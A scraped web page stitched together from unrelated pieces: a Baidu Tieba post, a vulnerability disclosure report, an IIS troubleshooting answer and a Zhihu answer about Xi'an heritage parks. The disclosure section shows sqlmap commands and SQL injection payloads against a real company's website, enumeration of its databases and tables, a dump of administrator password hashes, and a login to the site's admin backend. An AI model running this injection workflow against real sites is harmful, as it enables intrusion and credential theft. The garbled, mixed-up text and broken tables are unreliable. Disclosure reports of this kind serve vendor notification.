E老师，我进入省级专版的时候卡了一下结果跳过了信息采集··_e朝朝吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名：今日本吧第个签到，本吧因你更精彩，明天继续来努力！
本吧签到人数：0可签7级以上的吧50个
本月漏签0次！成为超级会员，赠送8张补签卡连续签到：天&&累计签到：天超级会员单次开通12个月以上，赠送连续签到卡3张
关注：90贴子：
E老师，我进入省级专版的时候卡了一下结果跳过了信息采集··
现在不知道怎么重新填写了··而且进协议书实名确认的时候就是这样·
今天我同学说他班主任发...
第一次撒那么大的谎
祝吧里所有的幼儿园、小...
深夜DJ久山 小可爱你们...
从2013年快乐男声夺冠，...
随便爆，有啥爆啥
快来人啊·
同求怎么解决，实名就是不能用
我真的好想开骂，但会被屏蔽吧
每对新人结婚成功的那一刻，送礼最多的吧友可以获得本次求婚的“月老”称号和成就,
内&&容:使用签名档&&
保存至快速回贴分享漏洞：
披露状态：
： 细节已通知厂商并且等待厂商处理中
： 厂商已经确认，细节仅向厂商公开
： 细节向核心白帽子及相关领域专家公开
： 细节向普通白帽子公开
： 细节向实习白帽子公开
： 细节向公众公开
简要描述：
~人生难得起起落落~还是要坚强的生活~朋友的情谊，比天还高，比地还辽阔~那些岁月我们一定会记得~朋友的情谊呀，我们今生最大的难得~
详细说明：
四川华澳融信投资管理有限公司站点http://**.**.**.**/content.aspx?id=，如图所示：将链接放入sqlmap检测，如图所示：系统中的所有数据库，如下所示：
code 区域[root@Hacker~]# Sqlmap -u &http://**.**.**.**/content.aspx?id=&
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://**.**.**.**
available databases [80]:
[*] a93710
[*] fayapower
[*] fayapxbbs
[*] gxlqjyzx
[*] gzhyseo
[*] jtylqx
[*] lingui88
[*] marutomo
[*] master
[*] nanchunhui01
[*] pxpstcom
[*] sqnbxinyi
[*] tempdb
[*] tiantang9988
[*] zouchangfu
[21:20:19] [INFO] fetched data logged to text files under 'F:\wooyun\sqlmap\Bin\
output\**.**.**.**'
查看当前数据库和用户，如下所示：code 区域[root@Hacker~]# Sqlmap -u &http://**.**.**.**/content.aspx?id=&
--current-user --current-db
[root@Hacker~]# Sqlmap -u &http://**.**.**.**/content.aspx?id=&
-D huao --tables
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=' AND
AND 'zgDf'='zgDf
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=' AND 7847=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(118)
+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN () THEN CHAR(49) ELSE CHAR(48) E
ND))+CHAR(58)+CHAR(103)+CHAR(115)+CHAR(112)+CHAR(58))) AND 'Tmkk'='Tmkk
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=' UNION ALL SELECT CHAR(58)+CHAR(109)+CHAR(118)+CHAR
(114)+CHAR(58)+CHAR(115)+CHAR(73)+CHAR(108)+CHAR(81)+CHAR(100)+CHAR(87)+CHAR(113
)+CHAR(105)+CHAR(111)+CHAR(106)+CHAR(58)+CHAR(103)+CHAR(115)+CHAR(112)+CHAR(58)-
[21:21:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[21:21:35] [INFO] fetching current user
current user:
'huao'
[21:21:35] [INFO] fetching current database
current database:
'huao'
[21:21:35] [INFO] fetched data logged to text files under 'F:\wooyun\sqlmap\Bin\
output\**.**.**.**'
[*] shutting down at 21:21:35
漏洞证明：
获取当前库中的所有表，如下所示：code 区域[root@Hacker~]# Sqlmap -u &http://**.**.**.**/content.aspx?id=&
-D huao --tables
Database: huao
[105 tables]
+---------------------------------------+
| dbo.Web_Info_Data
| dbo.Web_Info_Type
| dbo.fs_Attachments
| dbo.fs_Collect_News
| dbo.fs_Collect_Rule
| dbo.fs_Collect_RuleApply
| dbo.fs_Collect_Site
| dbo.fs_Collect_SiteFolder
| dbo.fs_News_URL
| dbo.fs_User_URL
| dbo.fs_User_URLClass
| dbo.fs_ads
| dbo.fs_ads_class
| dbo.fs_ads_stat
| dbo.fs_adstxt
| dbo.fs_api_commentary
| dbo.fs_api_faviate
| dbo.fs_api_navi
| dbo.fs_classdroptemplet
| dbo.fs_customform
| dbo.fs_customform_item
| dbo.fs_define_class
| dbo.fs_define_data
| dbo.fs_define_save
| dbo.fs_friend_class
| dbo.fs_friend_link
| dbo.fs_friend_pram
| dbo.fs_news
| dbo.fs_news_Class
| dbo.fs_news_Gen
| dbo.fs_news_JS
| dbo.fs_news_JSFile
| dbo.fs_news_JST_Class
| dbo.fs_news_JSTemplet
| dbo.fs_news_area
| dbo.fs_news_jobclass
| dbo.fs_news_page
| dbo.fs_news_site
| dbo.fs_news_special
| dbo.fs_news_sub
| dbo.fs_news_topline
| dbo.fs_news_unNews
| dbo.fs_news_vote
| dbo.fs_newsdroptemplet
| dbo.fs_old_news
| dbo.fs_special_news
| dbo.fs_specialdroptemplet
| dbo.fs_stat_Info
| dbo.fs_stat_class
| dbo.fs_stat_content
| dbo.fs_stat_param
| dbo.fs_sys_City
| dbo.fs_sys_Help
| dbo.fs_sys_Label
| dbo.fs_sys_LabelClass
| dbo.fs_sys_LabelFree
| dbo.fs_sys_LabelStyle
| dbo.fs_sys_PramUser
| dbo.fs_sys_Pramother
| dbo.fs_sys_User
| dbo.fs_sys_UserLevel
| dbo.fs_sys_admin
| dbo.fs_sys_admingroup
| dbo.fs_sys_logs
| dbo.fs_sys_newsIndex
| dbo.fs_sys_param
| dbo.fs_sys_parmConstr
| dbo.fs_sys_parmPrint
| dbo.fs_sys_styleclass
| dbo.fs_sys_userfields
| dbo.fs_sys_userother
| dbo.fs_user_Card
| dbo.fs_user_Constr
| dbo.fs_user_ConstrClass
| dbo.fs_user_Discuss
| dbo.fs_user_DiscussActive
| dbo.fs_user_DiscussActiveMember
| dbo.fs_user_DiscussClass
| dbo.fs_user_DiscussContribute
| dbo.fs_user_DiscussMember
| dbo.fs_user_DiscussTopic
| dbo.fs_user_Friend
| dbo.fs_user_FriendClass
| dbo.fs_user_Ghistory
| dbo.fs_user_Group
| dbo.fs_user_Guest
| dbo.fs_user_Guser
| dbo.fs_user_MessFiles
| dbo.fs_user_Message
| dbo.fs_user_Photo
| dbo.fs_user_Photoalbum
| dbo.fs_user_PhotoalbumClass
| dbo.fs_user_Requestinformation
| dbo.fs_user_constrPay
| dbo.fs_user_news
| dbo.fs_user_note
| dbo.fs_user_userlogs
| dbo.fs_user_vote
| dbo.fs_vote_Item
| dbo.fs_vote_Steps
| dbo.fs_vote_class
| dbo.fs_vote_manage
| dbo.fs_vote_param
| dbo.fs_vote_title
| dbo.station_userbaseinfo_province_tab |
+---------------------------------------+
查看当前表的数据，如下所示：code 区域[root@Hacker~]# Sqlmap -u &http://**.**.**.**/content.aspx?id=&
-D huao -T dbo.fs_sys_User --columns
Database: huao
Table: dbo.fs_sys_User
[45 columns]
+-----------------+----------+
+-----------------+----------+
| Addfriend
| Addfriendbs
| birthday
| datetime |
| CertNumber
| nvarchar |
| CertType
| nvarchar |
| EmailATF
| EmailCode
| nvarchar |
| FriendClass
| nvarchar |
| IDcardFiles
| nvarchar |
| isIDcard
| isMobile
| nvarchar |
| LastLoginTime
| datetime |
| LoginLimtNumber | int
| LoginNumber
| marriage
| nvarchar |
| MobileCode
| nvarchar |
| NickName
| nvarchar |
| OnlineTF
| OnlineTime
| ParmConstrNum
| nvarchar |
| PassQuestion
| nvarchar |
| RealName
| nvarchar |
| datetime |
| nvarchar |
| UserFace
| nvarchar |
| userFacesize
| nvarchar |
| UserGroupNumber | nvarchar |
| Userinfo
| UserName
| nvarchar |
| nvarchar |
| UserPassword
| nvarchar |
+-----------------+----------+
[20:15:51] [INFO] fetched data logged to text files under 'F:\wooyun\sqlmap\Bin\
output\**.**.**.**'获取当前管理员用户及账号和密码，如图所示：[root@Hacker~]# Sqlmap -u &http://**.**.**.**/content.aspx?id=&
-D huao -T dbo.fs_sys_User -C isAdmin,UserName,Userinfo,UserPassword --dump
Database: huao
Table: dbo.fs_sys_User
[6 entries]
+---------+------------+----------+------------------+
| isAdmin | UserName
| Userinfo | UserPassword
+---------+------------+----------+------------------+
| 91b974bd |
| 16a7c67e |
| chenxinrui | &blank&
| f1a0b468d16e3863 |
| cbfbe8f8 |
| 0abda1fe |
+---------+------------+----------+------------------+
f1a0b468d16e3863
查询结果：
查询结果：
查询结果：
[20:29:13] [INFO] table 'huao.dbo.fs_sys_User' dumped to CSV file 'F:\wooyun\sql
map\Bin\output\**.**.**.**\dump\huao\fs_sys_User.csv'
[20:29:13] [INFO] fetched data logged to text files under 'F:\wooyun\sqlmap\Bin\
output\**.**.**.**'
[*] shutting down at 20:29:13
感谢大牛帮忙解密，本来是要测试是否存在XSS，结果发现是风讯2.0系统，如图所示：默认后台管理地址，http://**.**.**.**/manage/Index.aspx，输入管理员用户密码，如图所示：查看用户信息，如图所示：
修复方案：
过滤~优化查询~修复你们更专业
版权声明：转载请注明来源 @
厂商回应：
危害等级：高
漏洞Rank：10
确认时间： 15:25
厂商回复：
CNVD确认并复现所述情况，已由CNVD通过软件生产厂商（或网站管理方）公开联系渠道向其邮件通报，由其后续提供解决方案并协调相关用户单位处置。
最新状态：
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
登录后才能发表评论，请先分享到：人人网51社区百度搜藏搜狐微博更多
团购排行Top10
报名车型姓名时间陈团员陆团员王团员董团员朱团员张团员张团员李团员顾团员李团员
团车网团购流程启动IIS后，访问所有站点都显示当文件已存在时无法创建该文件，为什么？
启动IIS后，访问所有站点都显示当文件已存在时无法创建该文件，为什么？
09-11-09 &匿名提问
楼上把详细错误代码贴出来,看看..IIS服务器出错的原因是复杂的。象服务启动失败、IIS进程中断或者站点不能启动这些错误都会在系统日志中记录一个错误事件。不论IIS出现何种错误，在确定排错方案之前，都应先使用事件查看器查阅系统日志所记录的相关事件。某些错误显然是由服务器硬件的损坏而造成的，而另一些由于软件原因造成的错误往往不易察觉。本节就一般性的IIS排错提供指导性的介绍。 　　重新启动IIS 　　按照微软产品的一般性排错方法和故障解决方案，大多数软件问题可以通过重新启动到方法得以解决。作为IIS5.0的新功能之一，我们可以在不重新启动计算机的情况下重启IIS服务，甚至相当严重的问题都可以采用这种方法解决。重新启动IIS服务可以强迫系统重置IIS进程的内存空间，故由于内存错误引起的问题可以得到解决。重启IIS的方法主要用于下列情况：网站应用程序瘫痪、且不能有效加以控制；网站应用程序工作不正常或者不稳定。[/TD] [/TR][/TABLE]　重新启动IIS服务的过程中，全部当前连接都不能保留，且重启期间服务器上的全部站点都不能工作。如果重启IIS服务不能解决问题，则重启服务器亦不会有效。 　　当站点应用程序不能正常工作时，按照下述步骤重新启动服务器的IIS服务： 　　1．在IIS管理控制树中展开IIS节点，选择需要重新启动IIS服务的计算机。 　　2．单击【操作】菜单，选择【重新启动IIS】。 　　3．在【停止/启动/重新启动】对话框中的【您向要IIS做什么】下拉列表中选择【重新启动服务器的IIS】 ，单击【确定】。 　　4．正在关闭】对话框显示重新启动IIS的进度，如果对话框长时间没有反应，单击【现在结束】并重新进行上述操作。 　　注意：不能使用基于HTML的IIS管理器（远程管理模式）进行上述重启操作。 　　对于单个站点的稳定性问题，不必重新启动整个IIS进程，只要重启站点即可。IIS排错 　　备份/还原IIS 　　如果世界上存在一个万无一失的服务器安全规划方案，那就是备份。曾经有人指出：一个优秀的系统管理员所做的最重要的三项工作就是：备份、备份、备份。 　　IIS的实现机制包括一个类似注册表的元数据库：MetaBase，有关IIS本身和站点的配置属性全部保存在Windows 2000和元数据库MetaBase中。因此，只要将相关的注册表和元数据库进行备份，即可保存站点相关的全部配置。即使在删除站点甚至重新安装IIS之后，仍然能够利用备份恢复到原来的状态。 　　备份IIS的步骤如下： 　　1．在IIS管理器中展开IIS节点，选择向要备份的计算机。 　　2．单击【操作】菜单，选择【备份/还原配置】。 　　3．在【备份/还原配置】对话框中的【备份】列表中列出全部备份文件以及备份时间。单击【创建备份】按钮。 　　4．在【备份配置】对话框中指定新建备份的名称，单击【确定】。 　　5．单击【关闭】完成备份。 　　默认情况下，备份文件将保存在 Winntsystem32inetsrvMetaBack目录中。 　　恢复备份的方法与此类似，在【备份/还原配置】对话框中的【备份】列表中选择一个备份文件，单击【还原】。然后再如左图所示的提示对话框中单击【确定】，一段时间之后，IIS服务器恢复到进行备份时所处的状态。 　　如果服务器重装IIS之后需要恢复备份，则在上述恢复操作的基础上，还应进行额外的操作，步骤如下： 　　1．在命令提示符下，键入cscript.exe X:InetPubAmdinScriptsAdsutil.vbs enumw3svc，此处&X&是安装IIS的驱动器号。从列出的设置中，查找WamUserName和相关的WAMUserPass的值。 　　2．在控制面板中双击【管理工具】，然后双击【计算机管理】。 　　3．选择【本地用户管理器】，然后单击【用户】。双击【IWAM_computername】用户帐户。键入从以前步骤找到的WAMUserPass值，并单击【确定】。 　　4．在【配置备份名】对话框中，选择创建的备份文件，然后单击【还原】。此时配置将得到完全还原。　　IIS排错　 　　TCP/IP排错 　　TCP/IP协议问题往往是导致IIS不能正常工作的原因。当IIS出现错误但是可以判断IIS服务本身没有问题时，就要考虑是否网络连接出现问题，简单排除网络硬件损坏所造成的问题之后，我们的注意力就应集中在网络协议，主要是TCP/IP协议上。 　　Windows 2000提供了一系列TCP/IP排错工具，这些主要基于命令提示行的工具提供了诊断网络问题的强大手段。 　　使用ipconfig工具检查TCP/IP配置 　　ipconfig是一个查阅和管理客户机TCP/IP配置状态的命令提示行工具。在命令提示行中键入：ipconfig并回车，得到如右图所示的计算机基本TCP/IP配置属性，包括IP地址、子网掩码和缺省网关。 　　在命令提示行中键入：ipconfig /all并回车，得到详细模式的TCP/IP配置状态，除了基本信息之外，还包括主机名、DNS设置、WINS设置、DHCP设置以及物理地址、节点类型等TCP/IP信息。 　　如果计算机启用DHCP并使用DHCP服务器获得配置，可以使用ipconfig /renew命令开始刷新租约。也可以使用带/release选项的ipconfig命令立即释放主机的当前DHCP配置。 　　对于Windows 95和Windows 98客户机，应使用 winipcfg命令而不是ipconfig命令。 　　使用ping命令测试连接 　　Ping命令有助于验证IP级的连通性，发现和解决问题时，可以使用Ping向目标主机名或IP地址发送ICMP回应请求。在需要验证主机能否连接到TCP/IP网络和网络资源时使用Ping。 　　Ping命令实际上是向目标主机发送若干（缺省为4个）数据包，如果本地计算机与目标主机之间能够连通，目标主机将回复一条响应信息，如右上图所示，响应信息包括响应时间和TTL值。成功的Ping同一台主机说明IP数据能够在本地与目标主机之间传送。 　　如果收到超时信息，如右下图所示，则说明本地主机与目标主机之间的TCP/IP连接不能建立，可能的原因包括网络故障，协议错误以及TCP/IP配置错误等在确认网络连通性的时候，应按照以下顺序进行Ping测试： 　　1．Ping本地循环地址127.0.0.1，确定本地TCP/IP配置是否正确。 　　在命令提示行键入Ping 127.0.0.1。 　　2．Ping本机地址，检验本地IP地址设置是否正确。 　　3．Ping缺省网关地址，检验能否与本地子网之外的主机进行通信。 　　4．Ping远程子网上的主机，检验能否通过路由器进行远程通信。 　　如果以上Ping命令均能够得到响应，说明TCP/IP配置能够支持网络通信。否则，针对相应的网络组件进行设置检查。 　　使用netstat工具显示连接统计 　　可以使用netstat命令显示协议统计信息和当前的TCP/IP连接。 　　netstat -a命令将显示所有连接，而netstat -r显示路由表和活动连接。netstat -e命令将显示 Ethernet 统计信息，而netstat -s显示每个协议的统计信息。 　　如果使用 netstat -n，则不能将地址和端口号转换成名称。　　IIS错误代码大全　　400 无法解析此请求。 　　401.1 未经授权：访问由于凭据无效被拒绝。 　　401.2 未经授权: 访问由于服务器配置倾向使用替代身份验证方法而被拒绝。 　　401.3 未经授权：访问由于 ACL 对所请求资源的设置被拒绝。 　　401.4 未经授权：Web 服务器上安装的筛选器授权失败。 　　401.5 未经授权：ISAPI/CGI 应用程序授权失败。 　　401.7 未经授权：由于 Web 服务器上的 URL 授权策略而拒绝访问。 　　403 禁止访问：访问被拒绝。 　　403.1 禁止访问：执行访问被拒绝。 　　403.2 禁止访问：读取访问被拒绝。 　　403.3 禁止访问：写入访问被拒绝。 　　403.4 禁止访问：需要使用 SSL 查看该资源。 　　403.5 禁止访问：需要使用 SSL 128 查看该资源。 　　403.6 禁止访问：客户端的 IP 地址被拒绝。 　　403.7 禁止访问：需要 SSL 客户端证书。 　　403.8 禁止访问：客户端的 DNS 名称被拒绝。 　　403.9 禁止访问：太多客户端试图连接到 Web 服务器。 　　403.10 禁止访问：Web 服务器配置为拒绝执行访问。 　　403.11 禁止访问：密码已更改。 　　403.12 禁止访问：服务器证书映射器拒绝了客户端证书访问。 　　403.13 禁止访问：客户端证书已在 Web 服务器上吊销。 　　403.14 禁止访问：在 Web 服务器上已拒绝目录列表。 　　403.15 禁止访问：Web 服务器已超过客户端访问许可证限制。 　　403.16 禁止访问：客户端证书格式错误或未被 Web 服务器信任。 　　403.17 禁止访问：客户端证书已经到期或者尚未生效。 　　403.18 禁止访问：无法在当前应用程序池中执行请求的 URL。 　　403.19 禁止访问：无法在该应用程序池中为客户端执行 CGI。 　　403.20 禁止访问：Passport 登录失败。 　　404 找不到文件或目录。 　　404.1 文件或目录未找到：网站无法在所请求的端口访问。 　　注意 404.1 错误只会出现在具有多个 IP 地址的计算机上。如果在特定 IP 地址/端口组合上收到客户端请求，而且没有将 IP 地址配置为在该特定的端口上侦听，则 IIS 返回 404.1 HTTP 错误。例如，如果一台计算机有两个 IP 地址，而只将其中一个 IP 地址配置为在端口 80 上侦听，则另一个 IP 地址从端口 80 收到的任何请求都将导致 IIS 返回 404.1 错误。只应在此服务级别设置该错误，因为只有当服务器上使用多个 IP 地址时才会将它返回给客户端。详见:
请登录后再发表评论!西安的唐大明宫秦阿房宫汉长安城的未央宫主体建筑都不存在了，只留下夯土，西安市围绕这些遗址兴建了遗址公园，这样的意义在于什么？
明故宫现在也改修成明故宫遗址公园 也挺好的啊
反对最高票的房地产开发论，建立遗址公园的根本目的只有一个，就是保护大明宫遗址。城改拆迁不过是占了在大明宫遗址附近的利好罢了，不然全西安市那么多城中村改造，怎么先拆这里？遗址保护不是一笔小的财政支出，国家不拨款，全靠西安一市之力来做，指望有高尚觉悟的企业的讲着尊重历史保护遗址，赔钱免费给你做，太天真了吧。开发保护了遗址区，附近地价上升再卖给开发商，得来的钱反哺文化保护，给遗址公园的基础设施建设提供资金来源，这是唯一的办法，不然就等着城中村把遗址区蚕食殆尽吧。&br&&br&楼上很多答案说大明宫要啥没啥，没有意思，就是个普通的公园而已，唯一剩下的就是几个土堆。我想说，这些难道不应该是你来之前就知道的吗？大明宫已经过去几千年了，不是你想象中故宫那样辉煌壮丽的宫室楼阁，唐代土木结构的建筑也就山西硕果仅存，不然为什么要叫遗址公园呢？正是因为是遗址，西安市政府和曲江在大明宫没有进行任何形式的复建，才会被诟病“要啥没啥，没有意思。”虽然只剩下了夯土和断壁残垣，但至少可以证明秦阿房宫，汉长安城，唐大明宫曾经存在过，代表秦汉唐的皇宫文化和建筑技术发展水平和审美观念，遗址所蕴含的的信息对于研究建筑学，规划学，考古学，历史学来说都是珍贵的实物资料。&br&这就是为什么要保护这些遗址的原因。&br&&br&如果真的是对历史对文物有研究有爱好，在大明宫体会到的那种沧海桑田时空变幻的情感是很奇妙的。真正懂历史懂文化的人才会知道大明宫的“意思”究竟在哪里，才不会断然说出大明宫是个没意思的鬼地方，大雁塔钟楼是破楼破塔，西安是个没文化的地方类似这种话。&br&&br&&b&如果你要看的是辉煌壮丽的宫殿楼阁，对不起，你来错地方了，你应该去横店&/b&。&br&&br&大明宫的设计相当不错，西安是国内第一个做这么大遗址公园保护设计的城市，不像某些城市单纯的复建假文物，西安是用&b&概念化&/b&的设计，让人感受到那个曾经的千宫之宫的辉煌壮丽。&br&&img data-rawwidth=&948& data-rawheight=&949& src=&/47de7ed321ba9af7a196e3ad1e0c4f26_b.jpg& class=&origin_image zh-lightbox-thumb& width=&948& data-original=&/47de7ed321ba9af7a196e3ad1e0c4f26_r.jpg&&&br&&br&&img data-rawwidth=&1600& data-rawheight=&1600& src=&/f0dd57d0346fad38c3c6be1e_b.jpg& class=&origin_image zh-lightbox-thumb& width=&1600& data-original=&/f0dd57d0346fad38c3c6be1e_r.jpg&&&br&&img data-rawwidth=&1432& data-rawheight=&1432& src=&/80b74d868b1d9f947dc8b_b.jpg& class=&origin_image zh-lightbox-thumb& width=&1432& data-original=&/80b74d868b1d9f947dc8b_r.jpg&&&br&&br&&img data-rawwidth=&1317& data-rawheight=&1317& src=&/98f6e31f0af2aef279dc8_b.jpg& class=&origin_image zh-lightbox-thumb& width=&1317& data-original=&/98f6e31f0af2aef279dc8_r.jpg&&&br&&br&&img data-rawwidth=&1080& data-rawheight=&1080& src=&/be41d8c88d6d2e051fe6_b.jpg& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&/be41d8c88d6d2e051fe6_r.jpg&&&br&&img data-rawwidth=&640& data-rawheight=&640& src=&/eda53a84f6c_b.jpg& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&/eda53a84f6c_r.jpg&&&br&&br&&img data-rawwidth=&1447& data-rawheight=&1448& src=&/ebfbdb8fe7ce_b.jpg& class=&origin_image zh-lightbox-thumb& width=&1447& data-original=&/ebfbdb8fe7ce_r.jpg&&&br&&br&最后回答最高票的问题。&br&&b&榨干了房地产业的价值以后，大明宫还靠什么维持收益？&/b&&br&&br&对不起，你搞错概念了，大明宫，还有南郊的曲江池遗址，从来不是要收益的地方，大明宫的立项建设之初，除了保护核心的遗址以外，更多的作为西安北郊城市中央绿地公园的&b&社会公益性&/b&。如果大明宫要收益，早就和大唐芙蓉园一样收门票了。公园日后的维护属于西安市政府常规财政支出的一部分，这部分绝对省不掉，也占不到西安市财政的大头，遗址就在那，总不至于冒天下之大不韪把遗址挖了盖房子吧。从前的北郊什么公园也没有，但至少现在，大明宫是西安乃至全国首屈一指的城市中央公园，全国从来没有哪座城市在城市中央二环以内有这么大一片免费的绿地公园，让市民在每天的清晨和傍晚，在大明宫散步锻炼休闲。&br&&br&&br&除了西安，估计只有纽约的中央公园类似。&br&&img data-rawwidth=&640& data-rawheight=&960& src=&/0fe67a94f255db9d034ccc91a202fa5d_b.jpg& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&/0fe67a94f255db9d034ccc91a202fa5d_r.jpg&&&br&&br&&img data-rawwidth=&2048& data-rawheight=&2048& src=&/ad70f728d846a74bbefd5be3a0d7c053_b.jpg& class=&origin_image zh-lightbox-thumb& width=&2048& data-original=&/ad70f728d846a74bbefd5be3a0d7c053_r.jpg&&&br&&br&&br&&br&&b&再反对最高票有关大雁塔天际线的部分。&/b&&br&西安大雁塔轴线的限高做的非常好，无论是东西南北哪个角度，从雁塔北路，雁塔西路，曲江池方向看过来，都只有大雁塔一个非常高的建筑。但是如果要求大雁塔附近方圆几公里都要比大雁塔低这也太耍流氓了。对于历史和文化应该尊重，但是否就让历史和文化成为未来发展的包袱？大雁塔的文化价值不在于是否在当地为最高，如果为了突显其宏伟就不发展周边的城区，就有些太矫情太流氓了。&br&&br&曲江的天际线还是相当不错的。&br&当然，如果你站在地上，随随便便拍的那也能叫&b&天际线&/b&，那我没话说。&br&&img data-rawwidth=&2048& data-rawheight=&2048& src=&/9f07ef020e7d212e0ea1eaf0a8006889_b.jpg& class=&origin_image zh-lightbox-thumb& width=&2048& data-original=&/9f07ef020e7d212e0ea1eaf0a8006889_r.jpg&&&br&&br&大雁塔七层东西南北方向。&br&哪个方向比大雁塔高了？&br&&img data-rawwidth=&2048& data-rawheight=&2048& src=&/cd2baf5d150d141d47eacbe_b.jpg& class=&origin_image zh-lightbox-thumb& width=&2048& data-original=&/cd2baf5d150d141d47eacbe_r.jpg&&&br&&br&曲江全是低矮的建筑。&br&别说曲江房价高，你买不起，怪谁？&br&哪个城市还没有个房价高的区域了。&br&&img data-rawwidth=&2048& data-rawheight=&1265& src=&/ceabca04bf37813ebfbaff_b.jpg& class=&origin_image zh-lightbox-thumb& width=&2048& data-original=&/ceabca04bf37813ebfbaff_r.jpg&&&br&&img data-rawwidth=&640& data-rawheight=&640& src=&/64f1ba4647cdab40ac3bea_b.jpg& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&/64f1ba4647cdab40ac3bea_r.jpg&&&br&以上。
反对最高票的房地产开发论，建立遗址公园的根本目的只有一个，就是保护大明宫遗址。城改拆迁不过是占了在大明宫遗址附近的利好罢了，不然全西安市那么多城中村改造，怎么先拆这里？遗址保护不是一笔小的财政支出，国家不拨款，全靠西安一市之力来做，指望有…
有遗址在，对着柱坑，可以开开脑洞，补完结构，感受规模，甚至可以对照史料模拟场景，理解史书的叙述....&br&如果没有这些，只告诉你一些数据，很难有太多实际体验...&br&去过一些遗址才发型，其实很多城址要比想像得小，也有很多城址远比想像得宏大......
有遗址在，对着柱坑，可以开开脑洞，补完结构，感受规模，甚至可以对照史料模拟场景，理解史书的叙述....如果没有这些，只告诉你一些数据，很难有太多实际体验...去过一些遗址才发型，其实很多城址要比想像得小，也有很多城址远比想像得宏大......
尽其天年，无愧于心